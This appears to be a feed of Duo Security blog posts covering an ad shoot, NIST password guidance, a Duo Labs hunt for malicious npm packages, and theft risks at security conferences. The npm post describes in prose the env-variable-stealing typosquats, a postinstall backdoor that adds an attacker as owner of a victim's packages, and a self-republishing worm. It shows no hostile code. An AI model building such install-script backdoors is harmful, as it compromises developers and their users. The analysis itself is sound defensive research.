The level of pre-production for the ad was a first for Duo. We booked actors from a well-known talent agency in Detroit, a full stack commercial camera and lighting crew, plus wardrobe, hair and makeup departments. Even though it was unusual for a tech security company to work directly with the production crew, thanks to our experience shooting and directing commercials, overall it was a pleasant, painless process.

To keep costs down, we shot everything near our homebase in Ann Arbor, Michigan. The airplane hangar scenes were filmed at Ann Arbor Municipal Airport (courtesy of our friends at Notion), while the office scenes all took place at Duo’s space in the historic Allmendinger Building, a former organ factory.

A view from behind the camera

Just a week before the shoot, our office was completely renovated with a modern, stylish design, so all we had to do was complement the space with props and artwork. With a clever use of art direction, lighting and sound, we created two opposing worlds. On one hand there’s Duo green - a calm, easy to use, zenlike approach to security. In contrast, red meant a life of stress, difficulty and time slipping away.

With a clean Super 35mm sensor and flexible dynamic range, the RED Epic was our camera of choice for this production. We realized early on that natural daylight would be our best key light to capture each scene throughout the open-plan office, while a few carefully placed Kino Flo 4Bank fixtures provided the right amount of key light to create the two worlds.


To provide more flexibility in post production, we kept the device screens blank with motion tracking marks. This allowed us to carefully design screens that clearly communicated Duo’s features. Plus, we can future-proof the spot by updating the screens when we introduce new features.

Ultimately, producing the spot in-house was a great success. Taking advantage of our creative team’s expertise in the product allowed us to fully express our vision and stay true to Duo’s brand and style. Because we’re steeped in Duo day in and day out, it helped capture the nuances of what we do and how we do it in a way that an outside agency would be hard pressed to pull off. When all was said and done, we emerged with a piece of content that we’re super proud to share with you.

Take a behind-the-scenes look at the Duo Vs. Everybody shoot:


Learn About Duo vs. Traditional Two Factor

<![CDATA[NIST Update: Passphrases In, Complex Passwords Out]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/nist-update-passphrases-in-complex-passwords-out https://duo.com/blog/nist-update-passphrases-in-complex-passwords-out Industry News Wed, 09 Aug 2017 08:00:00 -0400

In June, the National Institute of Science and Technology (NIST) released new standards for password security in the final version of Special Publication 600-83. Specifically, NIST refers to new password security guidelines in the document SP 800-63B: Authentication & Lifecycle Management (PDF). Federal agencies and contractors use NIST’s standards as guidelines on how to secure digital identities.

The Old Normal

Back in 2003, over a decade ago, a NIST manager named Bill Burr wrote up a document that advised users on password complexity - including the use of special characters, numerals and capitalization. This guide was used by federal agencies, universities and large companies as the standard for password security best practices.

But in a recent interview with The Wall Street Journal, Bill, now retired, revealed that he regrets much of what he did. His guidelines included changing passwords every 90 days, which often resulted in users minimally editing old passwords that left them easy to guess.

These seemingly complex passwords are also easy for hackers and algorithms to crack, and are no longer considered best practice - due, in part, to negative impacts on usability.

Trending Toward Usability, Passphrases

New NIST guidelines recommend using long passphrases instead of seemingly complex passwords. A passphrase is a “memorized secret” consisting of a sequence of words or other text used to authenticate their identity. It’s longer than a password for added security.

NIST is also concerned with lightening the “memory burden” on users, and recommends encouraging users to create unique passphrases they can remember, using whatever characters they want. To help improve user experience and ease the memory burden, NIST also recommends supporting the copy and paste functionality in password fields.

Other don’ts include don’t require users to create a mixture of different character types for their passwords, and don’t arbitrarily require users to change their passwords unless there’s been a password breach.

Additionally, NIST requires allowing up to 64 characters in password form fields, and a minimum of at least eight characters. NIST also advises against storing “hints” or “subscribers” (i.e., what’s the name of your pet?), which can be accessed by unauthorized users.

NIST provides further guidance on securely storing passwords, requiring them to be salted and hashed using a one-way key derivation function. The salt should be at least 32 bits and chosen arbitrarily. Plus, NIST recommends using an additional hash with a salt stored separately from the hashed password to prevent brute-force attacks.

Stronger Authentication With Two Factor (2FA)

Relying solely on the security strength of passwords and passphrases isn’t enough to protect against brute-force, phishing and other attempts to bypass authentication.

A second factor of authentication can help secure access to your users’ accounts. Use the most secure methods, such as Duo Push (sending push notifications to a second device, like a smartphone for users to approve) or U2F (stands for Universal 2nd Factor - a USB device plugged into a laptop that users can tap to approve).

Learn more about two-factor authentication in the Two-Factor Authentication Evaluation Guide and the characteristics of a modern 2FA solution.

<![CDATA[Hunting Malicious npm Packages]]> jwright@duo.com(Jordan Wright) https://duo.com/blog/hunting-malicious-npm-packages https://duo.com/blog/hunting-malicious-npm-packages Duo Labs Tue, 08 Aug 2017 00:00:00 -0400

Last week, a tweet was posted showing that multiple packages were published to npm, a Javascript package manager, that stole users’ environment variables:

The names of these malicious packages were typosquats of popular legitimate packages. In this case, the attackers relied on developers incorrectly typing in the name of the package when they ran npm install.

This is dangerous because many environments store secret keys or other sensitive bits of information in environment variables. If administrators mistakenly installed these malicious packages, these keys would be harvested and sent to the attacker. And, in this particular attack, the malicious packages were listed to "depend" on the legitimate counterparts, so the correct package would eventually be installed and the developer would be none the wiser.

With npm having a history of dealing with malicious packages - either hijacked legitimate packages or malicious packages created from scratch - we decided to analyze the entire npm package repository for other malicious packages.

This Isn't npm's First Rodeo

This isn't the first time npm has had incidents like this. In 2016, an author unpublished their npm packages in response to a naming dispute. Some of these packages were listed as dependencies in many other npm packages, causing widescale disruption and concerns around possible hijacking of the packages by attackers.

In another study published earlier this year, a security researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages) by either brute-forcing weak credentials or by reusing passwords discovered from other unrelated breaches, leading to mass password resets across npm.

The impact of hijacked or malicious packages is compounded by how npm is structured. Npm encourages making small packages that aim to solve a single problem. This leads to a network of small packages that each depend on many other packages. In the case of the credential compromise research, the author was able to gain access to some of the most highly depended-upon packages, giving them a much wider reach than they would have otherwise had.

For example, here's a map showing the dependency graph of the top 100 npm packages (source: GraphCommons)

Dependency Graph

How Malicious npm Packages Take Over Systems

In both of the previous cases, access to the packages was gained by researchers. However, the question stands - what if an attacker gained access to the packages? How can they use this access to gain control of systems?

The easiest way, which was also the way leveraged by the malicious typosquat packages, is to abuse the ability for npm to run preinstall or postinstall scripts. These are arbitrary system commands specified in the npm package's package.json file to be run either before or after the package is installed. These commands can be anything.

Having this ability is not, by itself, an issue. In fact, these installation scripts are often used to help set up packages in complex ways. However, they are an easy way for attackers to leverage access to packages - hijacked or created - in order to easily compromise systems.

With this in mind, let's analyze the entire npm space to hunt down other potentially malicious packages.

Hunting for Malicious npm Packages

Getting the Packages

The first step in our analysis is getting the package information. The npm registry runs on CouchDB at registry.npmjs.org. There used to be an endpoint at /-/all that returned all the package information as JSON, but it has since been deprecated.

Instead, we can leverage a replica instance of the registry at replicate.npmjs.org. We can use the same technique leveraged by other libraries to get a copy of the JSON data for every package:

curl https://replicate.npmjs.com/registry/_design/scratch/_view/byField > npm.json

Then, we can use the JSON processing tool jq to parse out the package name, the scripts, and the download URL with this nifty one-liner:

cat npm.json | jq '[.rows | to_entries[] | .value | objects | {"name": .value.name, "scripts": .value.scripts, "tarball": .value.dist.tarball}]' > npm_scripts.json

To make analysis easier, we'll write a quick Python script to find packages with preinstall, postinstall, or install scripts; find files executed by the script; and search those files for strings that could indicate suspicious activity.


PoC Packages

Developers have known about the potential implications of installation scripts for quite a while. One of the first things we noticed when doing this research were packages that aimed to show the impact of these exact issues in a seemingly benign way:

Tracking Scripts

The next thing we found were scripts that tracked when the packages were installed. Npm provides some download metrics on the package listing itself, but it appears that some authors wanted more granular data, causing potential concerns around user privacy. Here are some packages using Google Analytics or Piwik to track installations:

Some packages were less obvious about their tracking, in that they hid the tracking scripts within Javascript installation files rather than just embedding shell commands in the package.json.

Here are the other tracking packages we discovered:

Malicious Scripts

Finally, we looked for packages that had installation scripts that were obviously malicious in nature. If installed, these packages could have disastrous effects on the user's system.

The Case of mr_robot

Digging into the remaining packages, we came across an interesting installation script in the shrugging-logging package. The package's claims are simple: it adds the ASCII shrug, ¯_(ツ)_/¯, to log messages. But, it also includes a nasty postinstall script which adds the package's author, mr-robot, to every npm package owned by the person who ran npm install.

Here's a relevant snippet. You can find the full function listing here.

This script first uses the npm whoami command to get the current user’s username. Then, it scrapes the npmjs.org website for any packages owned by this user. Finally, it uses the npm owner add command to add mr_robot as an owner to all of these packages.

This author has also published these packages, which include the same backdoor:

  • test-module-a
  • pandora-doomsday
Worming into Local Packages

The last malicious package we discovered had code that was, in many ways, identical to the packages from mr_robot, but had a different trick up its sleeve. Instead of just modifying the owners of any locally-owned npm packages, the sdfjghlkfjdshlkjdhsfg module shows a proof of concept of how to infect and re-publish these local packages.

The sdfjghlkfjdshlkjdhsfg installation script shows what this process would look like by modifying and re-publishing itself:

You can find the full source here.

While this is a proof-of-concept, this exact technique can be easily modified to worm into any local package owned by the person doing the install.


It’s important to note that these issues don't just apply to npm. Most, if not all, package managers allow maintainers to specify commands to be executed when a package is installed. This issue is just arguably more impactful to npm simply due to the dependency structure discussed earlier.

In addition to this, it's important to note that this is a hard problem to solve. Static analysis of npm packages as they are uploaded is difficult - so much so that there are companies dedicated to solving the problem.

There are also reports from npm developers that suggests there may be work being done to leverage various metrics to help prevent users from downloading malicious packages:

In the meantime, it's recommended to continue being cautious when adding dependencies to projects. In addition to minimizing the number of dependencies, we recommend enforcing strict versioning and integrity checking of all dependencies, which can be done natively using yarn or using the npm shrinkwrap command. This is an easy way to get peace of mind that the code used in development will be the same used in production.

<![CDATA[Security Conference OPSEC]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/security-conference-opsec https://duo.com/blog/security-conference-opsec Duo Labs Mon, 07 Aug 2017 08:00:00 -0400

While we as security professionals regularly watch out for such dangers as creepy “free” Wi-Fi hotspots, evil hoodied hackers typing in their fingerless gloves unleashing havoc, and the dreaded nation-state spy rings assaulting us for our corporate secrets, there are, perhaps, other dangers one should look out for - ourselves.

Black Hat - Unattended Luggage

Photo 1: A sea of unmonitored bags at the “check your bag” area at a security conference this year.

OPSEC. It stands for operational security, and while it has a much more expansive meaning than I’m going to cover here, I did want to make a few points. I’ve talked about attending conferences before, and given you a few tips for remaining safe for your travels.

Your biggest danger is probably going to be regular crime. I recently returned from Las Vegas after attending Black Hat and DEF CON, saw some remarkably bad OPSEC, and took a few photos. While attending a security conference, I guess I expected a community centered around computer security would think about all security issues pretty much 24/7, and a few pics were tweeted out with my pithy remarks. But it did occur to me that I could probably explain things in a slightly more helpful manner than 140-character chunks of gut reaction, and point out fairly common pitfalls when it comes to OPSEC.

Near the end of my visit, I learned of three separate individuals that I know personally (and heard of several others) that experienced issues with OPSEC and stolen items, so I thought I’d turn some of those tweets into something a little more constructive.

Trading Trust For Convenience

In Photo 1 above, there are a large amount of rollerboards and other travel bags, all belonging to various Black Hat conference attendees. As an added convenience, the conference organizers had worked out with Mandalay Bay (where the conference was being held) for a resort bellhop to operate a checked bag area. This way, conference attendees didn’t have to traverse the entire property to go to the bell desk to check bags if they were heading to the airport at the end of the day.

Now, the main front desk area where bags are stored are off-limits to everyone except hotel staff. They have highly organized shelves, and are watched by cameras located near the main doors and on the edge of a casino floor. However in this makeshift front desk area in the conference, there were no shelves, meaning a larger footprint was used; the plastic poles and nylon bands between them were the security barrier; and they were in a walkway area that led to the vendor floor. Granted, this was a side entrance to that vendor floor, but a legitimate entrance nonetheless.

I didn’t conduct a serious examination, but it appeared that there were no cameras that I could see in this area, since it didn’t involve an entrance nor gaming of any kind. There was a single table that functioned as a desk for the bellhop, and the first time I went by there, there was no bellhop in sight. In fact, there was a second table behind the first one next to the bags, and a couple of gentlemen were taking a break from the conference to have a chat at that table.

As you can see in the picture, everything is remarkably out in the open, and I think anyone could have walked up and grabbed a bag from the back. About 30 minutes later, I walked by again and the bellhop was there, but so were the two chatting gentlemen who were obviously not asked to leave.

The safer thing to do would be to use the main front desk with its additional security and just deal with the long walk. Avoid this satellite operation lacking all of the safeguards to protect bags.

Free USB Chargers

Photo 2: Free power for charging your phone, available in two flavors.

While Photo 2 itself doesn’t show what I believe to be an actual problem, one would normally have to be fairly trusting to simply power up your phone with a strange cable where you can’t see the other end of it. This was at a vendor booth in one of the main hallways at Black Hat, where they’d set up a lounge area with comfortable seating and tables. They offered free charging, which again is convenient.

A lot of us use portable chargers, and I would encourage investing in one. It gives you that extra freedom of not being on the lookout for a power source because you’ve been using your phone all day at the conference and can’t find an open outlet. It has obvious advantages when it comes to travel, either at the airport terminal or during a long flight.

Like I said, this was probably safe in this instance, but it encourages a mindset that any and all free power sources for phone charging are safe - for example, like those sketchy-looking USB ports at the airport.

Unattended Personal Items

Unattended Bags

Photo 3, left: On the other side of the unattended canvas bag is a purse. Photo 4, right: A conference attendee saves a lunch spot.

Leaving your valuables unattended is a no-no. Photo 3 was taken during Black Hat in the vendor area on the second level. While I didn’t feel I could get a photo from the proper angle without looking really creepy to the owner, the canvas bag in the photo contained swag from the her employer’s vendor booth right around the corner, and blocked the view from my phone’s camera of her purse. The bags stayed there for at least 30 minutes (I watched her drop them off), and from the angle I was at I could have easily stole it unseen.

In Photo 4 during lunch, a Black Hat conference attendee placed his laptop bag on a table to save his spot, and proceeded to turn his back on the bag and began to fill his plate. As I snapped that picture I heard several attendees around me snicker and one commented “one of us should grab his bag to teach him a lesson.”

If you have something valuable, keep it on your person, or lock it up in some way. A travel lock to secure a strap around a table leg is nice, and some bags have all kinds of anti-theft security features - while not perfect there are many deterrents one could use. Anything that causes a thief to think twice will hopefully motivate them to find easier targets.

Keep It With You, But Safe

Personal Items at Security Cons

Photo 5, left: Items nearly falling out of pockets. Photo 6, right: Backpack with DEF CON guide, next to it were apparently travel documents.

Both Photos 5 and 6 had either items falling out of pockets or in wide-open pockets that were easily accessible. This is the kind of thing a pickpocket would look for - easy targets with a high chance of undetected success.

Don’t overstuff your pockets, put them into a small bag or backpack, keep wallets and purses in front, and if your valuables are on your back, secure them. Again, travel locks are your friend for locking things together like zippers, and at least consider non-essentials in outer exposed pockets (or leaving them empty) if you can’t readily secure them.

Other Considerations

It is possible that due to a position you hold within your organization, or what your organization does, there might be direct targeting of you - the person at the conference wandering about. While your level of OPSEC might be a little more heightened, don’t forget about some of the physical aspects. The precautions mentioned above still apply - but if you work in a sensitive industry like many attendees of security conferences like Black Hat and DEF CON do, you should definitely step up your game.


There is nothing wrong with being paranoid and overly cautious. My main point is to be realistic with your threats - don’t get caught up and worry about someone using a zero-day and targeting just you at the expense of all other considerations, because a zero-day being deployed at a security conference is rare event.

Another thing to keep in mind - getting pwned at a security conference like DEF CON is most likely going to be an embarrassing doxing, while having your ID, credit cards, laptop, cash and phone stolen is going to be an absolute nightmare (especially getting through security at the airport to head home).

What we are talking about here is risk assessment at a very basic level - when you are in a town filled with drunk tourists carrying gambling money, there is a greater risk of being pickpocketed or having a bag stolen than of having your system compromised. In other words, this type of advice is more about what one tells anyone visiting Las Vegas, or any other similar large city you might be unfamiliar with. You’re in a strange place where the rules are slightly different - adjust your risk level accordingly.

Stay safe, be aware of your environment at all times, watch your valuables like you watch those security logs, and try to make things harder for the bad guys.